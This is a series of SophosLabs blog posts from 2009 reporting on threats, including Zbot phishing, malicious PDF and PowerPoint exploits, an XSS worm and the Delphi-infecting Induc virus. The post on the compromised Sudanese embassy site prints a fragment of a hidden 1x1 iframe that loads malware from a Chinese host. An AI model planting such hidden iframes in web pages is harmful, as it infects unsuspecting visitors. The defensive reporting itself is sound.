SophosLabs blog

This month’s “Patch Tuesday” includes 6 security updates - of which Microsoft has rated 3 as Critical (all remote code execution vulnerabilities) and 3 Important (two remote code execution vulnerabilities and one denial of service).

Mention-worthy updates this month include MS09-065 and MS09-068.

MS09-065 addresses several kernel vulnerabilities. The vulnerability of particular concern is related to specially crafted Embedded OpenType fonts, and could be exploited to run unauthorized code in the system context.

Most remote code execution vulnerabilities we see typically run in the user context at the same privilege level as the currently authenticated user. Now, if you’re the user this means that all your files are at risk, but the system itself is reasonably safe (unless your administrator hasn’t been adhering to best practices, and has granted you administrative privileges … in which case you’ve pretty much granted the attacker’s code access to the entire box). With this kernel-mode driver remote code execution vulnerability, the current user’s privilege level is irrelevant. It doesn’t matter how unprivileged the current user is - the unauthorized code has unfettered access to the local system. Assuming, that is, the attacker doesn’t destabilize the system and BSOD before their code runs. Kernel vulnerabilities have a habit of not just bringing down processes, but bringing down entire boxes.

MS09-068 is mention-worthy, as it addresses issues in Microsoft Word, for both the Windows AND Apple platforms. Windows users that have automatic updates configured will automatically have protection provided to them - but Apple users will have to rely on the Microsoft Office Update Utility “Microsoft AutoUpdate” or go to here, here or here, to download the relevant update.

You can find the rest of our analysis here.

And, as always, if you’ve found our vulnerability posts to be valuable, or have some suggestions for how we can better serve you, please let us know at sophosblog@sophos.com

In the past few weeks, the authors behind Zbot has been busy. Around October 12 we have seen the server upgrade spam with links. Later on the 14th we’ve seen the same campaign with the malware attached to similar-looking server upgrade notices. By the 22nd of October, the spam messages touts Outlook updates.

For a few days during the past week, the group has turned their attention to the Federal Deposit Insurance Corporation (FDIC), spamming out links to malware sites with the message below:

With the global economy as it is, notice of bank failures would certainly draw a lot of attention and irrational behavior. After all, thoughts of hard-earned money being gone forever is going to scare a lot of people. Of course, downloading the “personal FDIC insurance file” would give nothing but grief. The bank deposits are still safe, but the computer would probably get infected.

After the blast of FDIC messages, the Zbot authors turned to facebook as their latest platform to spread malware. However, they added a twist to it. The messages are well-crafted to look like a real Facebook message:

The message asks the user to update their facebook account. The new twist is that, when they get to the linked site, there is no link to download an executable yet. Instead, they’re shown with a fake Facebook login page:

Victims who have entered their facebook login would get their account details phished, probably for the purpose of spreading more malware. Since this is not a real facebook page, any random login info would bring you to this next page:

It is on this page where the malware author provides an executable for download. This file, updatetool.exe is a Zbot executable that is proactive detected as Mal/EncPk-LE.

With the creative social engineering that the Zbot authors have been using, users should be real careful when reading messages, whether it’s in an email or from a social network. Avoid clicking links directly, manually type the address to access the site, and not executing files would do a lot in protecting one’s computer.

This morning as I trawled the spam queues a sense of deja-vu descended on me when this subject line caught my eye:

         Update for Microsoft Outlook / Outlook Express (KB910721)

Didn’t I see this a while ago and didn’t it contain a rather nasty Trojan? 

The format of the October version differs slightly in that it includes a link to a website from which you may download the ‘Microsoft/Outlook/Outlook Express Update’  rather than an attached executable.     

The details have also been updated:

   Quick Details

         * File Name: officexp-KB910721-FullFile-ENU.exe
         * Version: 1.5
         * Date Published: Wed, 21 Oct 2009 16:05:06 +0100
         * Language: English
          * File Size: 100 KB

Of course this is not a Microsoft security update, but rather simply another attempt by the malware authors to fool you into installing their Trojan.  Encore une fois.

The advice from Sophos remains the same.  Visit the genuine Microsoft update site in order to obtain your fixes.

On Friday, SophosLabs posted news about a new Adobe Reader vulnerability believed to be in the wild (CVE-2009-3459, security posting from Adobe here). Since then a few more details have surfaced.

Readers may have seen reports of a malicious PDF in the wild exploiting this vulnerability. Sophos products already detect and block this sample as Troj/PDFJs-DS.

If the malicious PDF successfully exploits CVE-2009-3459, it attempts to infect the victim with a backdoor Trojan. The executable payload is detected by Sophos as Mal/Generic-A, and the backdoor Trojan (DLL) the executable installs is detected as Troj/Protux-Gen.

Testing thus far (with Adobe Reader 9.1.3 and 9.1.0) suggests that successful exploitation is unreliable (just observing Reader application crashing). Customers should stay alert for tomorrow’s security update from Adobe to patch this issue.

The Disney song ”The Wonderful Thing About Tiggers” has the lyric:

I’m the only one!
I-I-I-I’m…..the only one!

Except, it seems when we are talking about passwords in the latest list of ‘phished’ * passwords. Thanks to the people on Neowin the blog for pointing me at the data. After a quick analysis of the list, some of the most popular passwords are:

neopets
123456
monkey
123321
tigger
password
princess
pokemon
kitty
casper
123456789
neopet
anime
iloveyou

As well as being insecure, these passwords suggest a preoccupation with children’s popular culture. I would advise that parents not only change their passwords and check their computer security, but that they also ensure their kids’ change their passwords on their email accounts as well as any online forums they belong too.

* There is some debate in SophosLabs about these recent password lists as to whether they are the result of traditional spam phishes or other things.

Personally, I think that this data is a combination of

• some phishing emails
• keylogger data
• and a rogue social networking application phishing information

However this password list was compiled, all users should follow a password routine.

Simple tips for better web password security from SophosLabs on Vimeo.

Monitoring our queues yesterday I thought that I saw a fake Sudanese Embassy website serving malware (Mal/Iframe-F). The press release heading were strange:-

• Who is Blackmailing Whom?
• ICC – Europe’s Guantanamo?
• Sudan and ICC
• National Elections Commission

The suggestion that the International Criminal Court was like Guantanamo was not something I had heard before. So I went to the WHOIS of the site to see who owned the site:

Registrant's address:
60 Chambers Lane
London
NW10 2RL
United Kingdom

NW10 stands for the postcode area North West 10 i.e. Willesden Green. Not where you would traditionally think of Embassies being based in London.

The Contact details were correct though:-

Embassy of the Republic of the Sudan
3 Cleveland Row
St. James’s
London
SW1A 1DD

Curiouser and curiouser. Looking through search engine results on the site it appears that the site is that of the Embassy of Sudan in London!

So why had the site come up in the queues?

Well it contains an iframe with the following code:

.cn/in.cgi?id1000" width=1 height=1 style="visibility: hidden">

this malicious Iframe is very small and will download further malware from a Chinese website.

Like other embassies that have been hit, Ethiopia, India etc., the Sudanese haven’t been targeted deliberately but are victims of poor security.

We have seen a few malicious PowerPoint documents come through the labs in the past few days. These malicious documents exploit the MS06-028 vulnerability, for which a patch has been available since June 21… 2006. Yes, that’s right — a patch has been available for more than 3 years.

If you were one of the responsible ones, having patched your system at some point before now, then by opening one of these malicious documents, you would see the following:

Though if you saw this message, it is debatable how responsible you are — you let yourself be coerced into opening a malicious PPT on your machine.

For the completely irresponsible out there — not having patched your system and remaining blissfully unaware of the many recent zero-day Microsoft Office vulnerabilities — when you double-clicked one of these malicious PPT’s, you would notice a brief flicker on-screen before seeing the PowerPoint open a presentation to the following first slide:

Despite the fact that PowerPoint is now displaying a valid PPT file, you can be sure the malicious payload Troj/Protux-Gen has been dropped on your machine. The screen flicker is caused by the shellcode, which drops and runs another executable Troj/ReopnPPT-A that kills any open PowerPoint processes, removes the shellcode from the malicious PPT and re-opens PowerPoint with the newly disinfected presentation.

Sophos detects the malicious documents as Troj/ExpPPT-G. Clever buffer overflow protection mechanisms cannot help defend against these documents, since the exploit takes advantage of unchecked data in file parsing logic. In short, the vulnerability allows a pointer into the memory-mapped image of the PPT file to be calculated

and subsequently called.

For extra piece-of-mind, you can also check your PPT documents before opening them using Microsoft’s OffVis tool for parsing Office documents, which was released to the public about a month ago. It detects the exploit of several MS Office vulnerabilities, and indeed displays the following when examining a Troj/ExpPPT-G:

But this is all moot because you have already patched your system, right?

UPDATE: This appears to have been a pen-test.

There are reports (via ISC) that US Banking institutions have been subject to phishing attempts via snail mail.

Reportedly, the Credit Unions receive a package containing a letter from the NCUA and a CD with training material on it. If indeed the training material is actually malware, then one would suspect it is most likely to consist of some backdoor Trojan or a keylogger.

The NCUA press release give slightly more information on this threat with some instructions on what to do if you do receive the letter:

• You should contact your NCUA Regional Office
• or the NCUA Fraud Hotline at 1-800-827-9650

Added to this advice please contact your AV supplier and forward them a copy of the CD.

You can contact Sophos via:

Sophos Inc.
3 Van de Graaff Drive
2nd Floor
Burlington, MA
01803
USA

Tel: 781-494-5800
Fax: 781-494-5801

For the last few days we saw a XSS worm outbreak on renren.com - which is a facebook-like website in China.

The worm itself poses as a flash file for the “Pink Floyd - Wish You Were Here” video - which tries to execute an external javascript file.   The first line for the worm is a friendly greeting:

/ I’m not a malicious worm.^^;

The technique used in this worm exploits a simple XSS hole in the website - with a payload which has a flash component with the AllowScriptAccess=”always” attribute to allow the above “non-malicious” javascript to spread the worm via renren.com’s API. 

This is same technique used back in 2007 by the Okurt worm . 

We now detect the worm as W32/PinkRen-A.

Here’s something you don’t see every day - a virus that infects Delphi files … at compile-time.

When a file infected with W32/Induc-A runs, it looks to see if it can find a Delphi installation on the current machine. If it finds one, it tries to write malicious code to SysConst.pas, which it then compiles to SysConst.dcu (after saving the old copy of this file to SysConst.bak). The new infected SysConst.dcu file will then add W32/Induc-A code to every new Delphi file that gets compiled on the system - some of the strings from the inserted code look like this:

If you find detections of this in 3rd-party software, you might want to contact your suppliers to let them know they need to have a look at their system … and also take care to check machines you might have with Delphi installed.

There’s a classic paper called Reflections on Trusting Trust, that concludes that you can’t trust code that you didn’t write yourself from the very lowest level - this is a great example of where compiling the code yourself doesn’t necessarily mean that it’s clean.

Update: Please be aware - this virus isn’t just a threat if you are a software developer who uses Delphi. It’s possible that you are running programs which are written in Delphi on your computers, and they could be affected. Sophos has received thousands of reports of programs infected by W32/Induc-A. Learn more on Graham Cluley’s blog.